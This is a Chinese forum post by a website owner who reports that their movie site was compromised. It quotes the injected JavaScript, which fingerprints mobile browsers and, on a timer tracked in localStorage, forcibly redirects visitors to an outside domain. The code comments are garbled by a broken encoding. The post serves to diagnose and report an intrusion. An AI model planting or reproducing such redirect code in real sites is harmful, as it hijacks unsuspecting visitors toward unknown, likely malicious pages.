本帖最后由 acg88 于 2023-11-18 23:37 编辑
电影 gqc.ink
植入的url https://abyss-static.anei.tv/js/adcgys.js
- function getMobileType() {
- var ua = window.navigator.userAgent; //navigator.appVersion
- return {
- mobile: !!ua.match(/AppleWebKit.*Mobile.*/), //鏄惁涓虹Щ鍔ㄧ粓绔�
- ios: !!ua.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios缁堢
- android: ua.indexOf("Android") > -1 || ua.indexOf("Linux") > -1, //android缁堢鎴栬€卽c娴忚鍣�
- iPhone: ua.indexOf("iPhone") > -1 || ua.indexOf("Mac") > -1, //鏄惁涓篿Phone鎴栬€匭QHD娴忚鍣�
- iPad: ua.indexOf("iPad") > -1, //鏄惁iPad
- trident: ua.indexOf("Trident") > -1, //IE鍐呮牳
- presto: ua.indexOf("Presto") > -1, //opera鍐呮牳
- webKit: ua.indexOf("AppleWebKit") > -1, //鑻规灉銆佽胺姝屽唴鏍�
- gecko: ua.indexOf("Gecko") > -1 && ua.indexOf("KHTML") == -1, //鐏嫄鍐呮牳
- weixin: ua.indexOf("MicroMessenger") > -1, //鏄惁寰俊 ua.match(/MicroMessenger/i) == "micromessenger",
- };
- }
- var jumpurl = "https://hn.ci3xg.com/1022.html";
- var jumpkey = window.location.hostname + "_adcgys_jmup_time";
- setInterval(function () {
- var timestamp = new Date().valueOf();
- var jmup_time = parseInt(window.localStorage.getItem(jumpkey));
- if (isNaN(jmup_time) || timestamp - jmup_time > 2 * 60 * 60 * 1000) {
- if (getMobileType().mobile) {
- setTimeout(function () {
- window.location.href = jumpurl;
- }, 3000);
- window.localStorage.setItem(jumpkey, new Date().valueOf());
- } else {
- setTimeout(function () {
- window.location.href = jumpurl;
- }, 30000);
- window.localStorage.setItem(jumpkey, new Date().valueOf());
- }
- }
- }, 1000);
复制代码
会跳转刀https://hn.ci3xg.com/1022.html
还没看到哪里触发这个js
更新




看文件修改时间,那段时间开始打不开页面,卡死,然后我重装程序,可以打开,但弹窗,找到被改文件,但目前还不确定怎样被拿权修改,虽然有怀疑对象但苦无证据。 |